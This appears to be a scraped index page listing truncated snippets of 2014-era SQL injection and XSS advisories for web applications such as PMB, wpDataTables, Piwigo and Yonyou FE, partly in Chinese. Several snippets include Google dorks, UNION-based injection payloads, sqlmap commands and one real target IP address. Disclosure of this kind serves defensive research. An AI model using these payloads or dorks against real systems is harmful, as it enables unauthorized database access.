PMB 4.1.3 - (Authenticated) SQL Injection

PMB 4.1.3 - Authenticated SQL Injection Exploit Title: PMB = 4.1.3 Post-Auth SQL Injection Vulnerability Google Dork: inurl:opaccss Date: 25-12-2014 Exploit Author: XD4rker Ismail Belkacim Email: xd4rkeratgmail.com Twitter: @xd4rker Vendor Homepage: http://www.sigb.net Software Link:...

PMB 4.1.3 SQL Injection

Exploit Title: PMB = 4.1.3 Post-Auth SQL Injection Vulnerability Google Dork: inurl:opaccss Date: 25-12-2014 Exploit Author: XD4rker Ismail Belkacim Email: xd4rkeratgmail.com Twitter: @xd4rker Vendor Homepage: http://www.sigb.net Software Link: http://forge.sigb.net/redmine/projects/pmb/files...

Wordpress wpDataTables Plugin 1.5.3 /wpdatatables.php SQL注入漏洞

wpdatatables.php // AJAX-handlers addaction 'wpajaxgetwdtable', 'wdtgetajaxdata' ; addaction 'wpajaxnoprivgetwdtable', 'wdtgetajaxdata' ; / Handler which returns the AJAX response / function wdtgetajaxdata $id = $GET'tableid'; $tabledata = wdtgettablebyid $id ; $columndata = wdtgetcolumnsbytablei...

某图书馆书目检索系统存在通用型SQL注入

简要描述： 某图书馆书目检索系统存在通用型SQL注入 详细说明： 汇文图书馆数目检索系统存在SQL注入 注入点doctype 谷歌搜索关键字：inurl:/opac/search.php，影响范围很大 1、访问http://120.195.143.181:9090/opac/search.php 发现搜索有多处参数，于是提交时抓包 GET...

Samurai Web Testing Framework 3.0 - LiveCD Web Pen-testing Environment

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed. Our hope is that people who are interested in making this the best...

嘉缘人才系统1处SQL注入#6(demo测试)

简要描述： 嘉缘人才系统1处time-based盲注. demo测试 http://v2014.rccms.com/ 详细说明： SQL注入在http://v2014.rccms.com/member/index.php?m=personinterview&show=works这个页面，删除面试通知处。 先看看代码： /member/personinterview.php 11 if$do=='del' 12 $checks=$POST'checks'; 13 $db -query"delete from $cfg'tbpre'myinterview where...

phpok最新版一处注入

简要描述： 最近没什么代码审计漏洞 给个前台呗 详细说明： phpok最新版 20141119 问题文件：/framework/model/data.php //还是老问题 //取得文章列表 public function arclist$rs 第102-105行: if$rs'userid' $sql.= "AND l.userid IN".$rs'userid'." "; $rs'userid' 是直接进入查询的造成注入 现在就是找哪个地方应用了 function arclist是从 function arclist过来的 找下arclist 找了下一共2个地方 一个不行 另一个就可...

WordPress Plugin wpDataTables 1.5.3 - SQL Injection

Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link : http://wpdatatables.com Premium Date : 2014-11-22 Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap 0.8-1 Linux / Mozilla Firefox Linux / sqlmap...

Wordpress wpDataTables 1.5.3 SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link : http://wpdatatables.com Premium Date : 2014-11-22 Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap...

WordPress wpDataTables 1.5.3 SQL Injection

Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link : http://wpdatatables.com Premium Date : 2014-11-22 Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap 0.8-1 Linux / Mozilla Firefox Linux / sqlmap...

XOOPS 2.5.6 blind SQL Injection Vulnerability

XOOPS versions 2.5.6 and below suffer from a remote blind SQL injection vulnerability. I. VULNERABILITY ------------------------- Blind SQL Injection in XOOPS 5.0.11 AND time-based blind comment' injectable INFO POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or HAVING clause MySQL...

Piwigo 2.6.0 - picture.php?rate SQL Injection

Piwigo 2.6.0 - picture.php?rate SQL Injection ============================================= MGC ALERT 2014-001 - Original release date: January 12, 2014 - Last revised: November 12, 2014 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 CVSS Base Score...

Joomla! Component com_hdflvplayer 2.1.0.1 - SQL Injection

Joomla! Component comhdflvplayer 2.1.0.1 - SQL Injection !/usr/bin/python Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://www.hdflvplayer.net/ Software Link : http://www.hdflvplayer.net/downloadcount.php?pid=5 Dork google 1:...

Piwigo 2.6.0 SQL Injection

============================================= MGC ALERT 2014-001 - Original release date: January 12, 2014 - Last revised: November 12, 2014 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 CVSS Base Score ============================================= I. VULNERABILITY...

用友FE协作办公系统SQL注入漏洞(一)

简要描述： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞 详细说明： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞，可直接union注入 注入链接：/sys/treeXml.jsp?Si06=1&type=sort 注入参数：Si06 Payload： Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort Sqlmap命令： python sqlmap.py -u 'http://xxxx//sys/treeXml.jsp?Si06=1&type=sort' -p Si06...

大米CMS某处SQL盲注2

简要描述： 大米CMS某处SQL盲注第二发，可直接拖库 详细说明： 文件/Web/Lib/Action/ApiAction.class.php //万能获取数据接口 function ajaxarclist $prefix = !empty$REQUEST'prefix'?bool$REQUEST'prefix':true; //表过滤防止泄露信息,只允许的表 if!inarray$REQUEST'model',array'article','type','ad','label','link'exit; if!empty$REQUEST'model' if$prefix == true...

Etiko CMS index.php cross-site scripting vulnerability-vulnerability warning-the black bar safety net

Affected system: Etiko Etiko CMS Description: CVECAN ID: CVE-2 0 1 4-8 5 0 5 Etiko CMS is a content management system. Etiko CMS did not effectively verify the index. php script input, in the realization on the presence of cross-site scripting vulnerability, a remote attacker with the structure o...

用友FE协作办公系统SQL注入漏洞

简要描述： RT 详细说明： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞，可直接union注入 注入链接：/system/config/deptTreeXml.jsp?type=group&SG04=1 注入参数：SG04 Payload：SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- Sqlmap注入：python sqlmap.py -u 'http://xxxx/system/config/deptTreeXml.jsp?type=group&SG04=1...

WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection

WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip Date : 2014-10-23 Tested on : Windows...

WordPress CP Multi View Event Calendar 1.01 SQL Injection Vulnerability

WordPress CP Multi View Event Calendar plugin version 1.01 suffers from a remote SQL injection vulnerability. Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability Exploit Author : Claudio Viviani Software Link :...